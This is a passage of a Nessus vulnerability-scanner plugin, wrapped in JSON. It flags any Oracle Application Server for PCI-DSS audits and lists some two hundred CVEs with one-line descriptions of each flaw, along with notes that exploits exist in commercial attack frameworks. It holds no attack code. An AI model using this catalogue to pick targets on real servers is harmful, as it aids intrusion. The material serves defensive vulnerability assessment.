\"CVE-2007-0283\",\n \"CVE-2007-0284\",\n \"CVE-2007-0285\",\n \"CVE-2007-0286\",\n \"CVE-2007-0287\",\n \"CVE-2007-0288\",\n \"CVE-2007-0289\",\n \"CVE-2007-1359\",\n \"CVE-2007-1609\",\n \"CVE-2007-2119\",\n \"CVE-2007-2120\",\n \"CVE-2007-2121\",\n \"CVE-2007-2122\",\n \"CVE-2007-2123\",\n \"CVE-2007-2124\",\n \"CVE-2007-2130\",\n \"CVE-2007-3553\",\n \"CVE-2007-3854\",\n \"CVE-2007-3859\",\n \"CVE-2007-3861\",\n \"CVE-2007-3862\",\n \"CVE-2007-3863\",\n \"CVE-2007-5516\",\n \"CVE-2007-5517\",\n \"CVE-2007-5518\",\n \"CVE-2007-5519\",\n \"CVE-2007-5520\",\n \"CVE-2007-5521\",\n \"CVE-2007-5522\",\n \"CVE-2007-5523\",\n \"CVE-2007-5524\",\n \"CVE-2007-5525\",\n \"CVE-2007-5526\",\n \"CVE-2007-5531\",\n \"CVE-2008-0340\",\n \"CVE-2008-0343\",\n \"CVE-2008-0344\",\n \"CVE-2008-0345\",\n \"CVE-2008-0346\",\n \"CVE-2008-0347\",\n \"CVE-2008-0348\",\n \"CVE-2008-0349\",\n \"CVE-2008-1812\",\n \"CVE-2008-1814\",\n \"CVE-2008-1823\",\n \"CVE-2008-1824\",\n \"CVE-2008-1825\",\n \"CVE-2008-2583\",\n \"CVE-2008-2588\",\n \"CVE-2008-2589\",\n \"CVE-2008-2593\",\n \"CVE-2008-2594\",\n \"CVE-2008-2595\",\n \"CVE-2008-2609\",\n \"CVE-2008-2612\",\n \"CVE-2008-2614\",\n \"CVE-2008-2619\",\n \"CVE-2008-2623\",\n \"CVE-2008-3975\",\n \"CVE-2008-3977\",\n \"CVE-2008-3986\",\n \"CVE-2008-3987\",\n \"CVE-2008-4014\",\n \"CVE-2008-4017\",\n \"CVE-2008-5438\",\n \"CVE-2008-7233\",\n \"CVE-2009-0217\",\n \"CVE-2009-0989\",\n \"CVE-2009-0990\",\n \"CVE-2009-0994\",\n \"CVE-2009-1008\",\n \"CVE-2009-1009\",\n \"CVE-2009-1010\",\n \"CVE-2009-1011\",\n \"CVE-2009-1017\",\n \"CVE-2009-1976\",\n \"CVE-2009-1990\",\n \"CVE-2009-1999\",\n \"CVE-2009-3407\",\n \"CVE-2009-3412\",\n \"CVE-2010-0066\",\n \"CVE-2010-0067\",\n \"CVE-2010-0070\",\n \"CVE-2011-0789\",\n \"CVE-2011-0795\",\n \"CVE-2011-0884\",\n \"CVE-2011-2237\",\n \"CVE-2011-2314\",\n \"CVE-2011-3523\"\n );\n\n script_bugtraq_id(\n 1053,\n 2150,\n 2286,\n 2569,\n 3341,\n 3726,\n 3727,\n 4032,\n 4034,\n 4037,\n 4289,\n 4290,\n 4292,\n 4293,\n 4294,\n 4298,\n 4844,\n 4848,\n 5119,\n 5262,\n 5362,\n 5363,\n 5364,\n 5366,\n 5452,\n 5847,\n 5887,\n 5902,\n 5995,\n 5996,\n 6556,\n 6846,\n 7395,\n 9515,\n 9703,\n 10009,\n 10829,\n 10871,\n 13145,\n 13418,\n 13509,\n 15034,\n 15134,\n 16287,\n 16294,\n 16384,\n 17590,\n 19054,\n 20588,\n 22027,\n 22083,\n 22831,\n 23102,\n 23532,\n 24697,\n 27229,\n 33177,\n 34461,\n 35671,\n 35688,\n 36746,\n 36749,\n 36753,\n 50202,\n 50209\n );\n\n script_name(english:\"Oracle Application Server Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Oracle Application Server. It was not possible\nto determine its version, so the version of Oracle Application Server\ninstalled on the remote host could potentially be affected by multiple\nvulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web\n listener component.\n\n - CVE-2000-1235: Information disclosure in the port\n listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java\n Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the\n PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP\n service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the\n administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL\n module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL\n Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through\n globals.jsa.\n\n - CVE-2002-0563: Improper access control on several\n services.\n\n - CVE-2002-0564: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2002-0565: Information disclosure through JSP files\n in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml\n and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through\n XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the default error\n page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several\n JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL\n package.\n\n - CVE-2002-1637: Default credentials in multiple\n components.\n\n - CVE-2002-1858: Information disclosure through the\n WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the\n administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache\n administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP\n pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on\n emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - CVE-2004-1370: Multiple SQL injection vulnerabilities in\n PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On\n component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the\n toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - CVE-2005-1496: Privilege escalation in the\n DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet\n Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J\n module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in\n multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in\n SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in\n Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net\n component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple unspecified vulnerabilities in\n the Oracle Reports Developer component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle\n Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in\n the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle\n PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net\n Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified vulnerability in the Oracle\n Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3708: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle\n Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in\n Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms\n component.\n\n - CVE-2006-5361: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5362: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle\n Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in\n EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in\n Oracle Reports Web Cartridge (RWCGI60).\n\n - CVE-2007-0280: Buffer overflow in Oracle Notification\n Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0284: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle\n Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle\n Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in\n servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the\n Administration Front End for Oracle Enterprise (Ultra)\n Search.\n\n - CVE-2007-2120: Denial of service in the Oracle\n Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid\n Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless\n component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2124: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2130: Unspecified vulnerability in Workflow\n Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in\n Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and the Spatial\n component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle\n Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-3863: Unspecified vulnerability in Oracle\n JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle\n Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help\n for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core\n RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-0347: Unspecified vulnerability in the Oracle\n Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in\n the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the\n PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle\n Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle\n Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle\n Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample\n Discussion Forum Portlet for the Oracle Portal\n component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-2589: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion\n BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle\n Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified vulnerability in the Oracle\n Discoverer Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J\n component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in\n multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0990: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1011: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip\n component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access\n Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2011-0884: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle\n Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle\n Web Services Manager component.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Verify that the version of Oracle Application Server installed is not\naffected by the listed vulnerabilities and/or filter incoming traffic to this port\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"remote code execution\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-053\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Oracle Secure Backup 10.2.0.2 RCE (Windows)\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 200, 255, 264, 287);\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service2.nasl\");\n script_require_keys(\"Settings/PCI_DSS\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/oracle_application_server\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\n# Only PCI considers this an issue.\nif (!get_kb_item(\"Settings/PCI_DSS\")) exit(0, \"PCI-DSS compliance checking is not enabled.\");\n\n# Make sure this is Oracle.\nport = get_kb_item_or_exit(\"Services/oracle_application_server\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# We're flagging every installation of Oracle Application Server, with\n# every vulnerability it has ever had.\nsecurity_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Oracle Internet Directory 10.1.4 - Remote Denial of Service

Description

Related